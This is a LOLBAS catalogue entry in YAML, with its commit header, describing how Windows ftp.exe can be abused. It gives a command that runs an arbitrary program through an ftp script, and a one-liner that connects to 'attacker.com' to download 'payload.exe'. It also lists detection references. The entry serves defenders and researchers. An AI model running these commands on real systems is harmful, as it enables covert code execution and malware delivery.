LOLBAS/yml/OSBinaries/Ftp.yml
frack113 4f83231697
Update old sigma link (#303)
* Update SigmaHQ ref

Signed-off-by: frack113 <62423083+frack113@users.noreply.github.com>

* Update SigmaHQ ref

Signed-off-by: frack113 <62423083+frack113@users.noreply.github.com>

* Update SigmaHq ref

Signed-off-by: frack113 <62423083+frack113@users.noreply.github.com>

* Update SigmaHq ref

Signed-off-by: frack113 <62423083+frack113@users.noreply.github.com>

---------

Signed-off-by: frack113 <62423083+frack113@users.noreply.github.com>
2023-10-18 11:30:34 -04:00

41 lines
1.8 KiB
YAML

---
Name: Ftp.exe
Description: A binary designed for connecting to FTP servers
Author: 'Oddvar Moe'
Created: 2018-12-10
Commands:
- Command: echo !calc.exe > ftpcommands.txt && ftp -s:ftpcommands.txt
Description: Executes the commands you put inside the text file.
Usecase: Spawn new process using ftp.exe. Ftp.exe runs cmd /C YourCommand
Category: Execute
Privileges: User
MitreID: T1202
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v"
Description: Download
Usecase: Spawn new process using ftp.exe. Ftp.exe downloads the binary.
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\System32\ftp.exe
- Path: C:\Windows\SysWOW64\ftp.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_ftp.yml
- IOC: cmd /c as child process of ftp.exe
Resources:
- Link: https://twitter.com/0xAmit/status/1070063130636640256
- Link: https://medium.com/@0xamit/lets-talk-about-security-research-discoveries-and-proper-discussion-etiquette-on-twitter-10f9be6d1939
- Link: https://ss64.com/nt/ftp.html
- Link: https://www.asafety.fr/vuln-exploit-poc/windows-dos-powershell-upload-de-fichier-en-ligne-de-commande-one-liner/
Acknowledgement:
- Person: Casey Smith
Handle: '@subtee'
- Person: BennyHusted
Handle: ''
- Person: Amit Serper
Handle: '@0xAmit'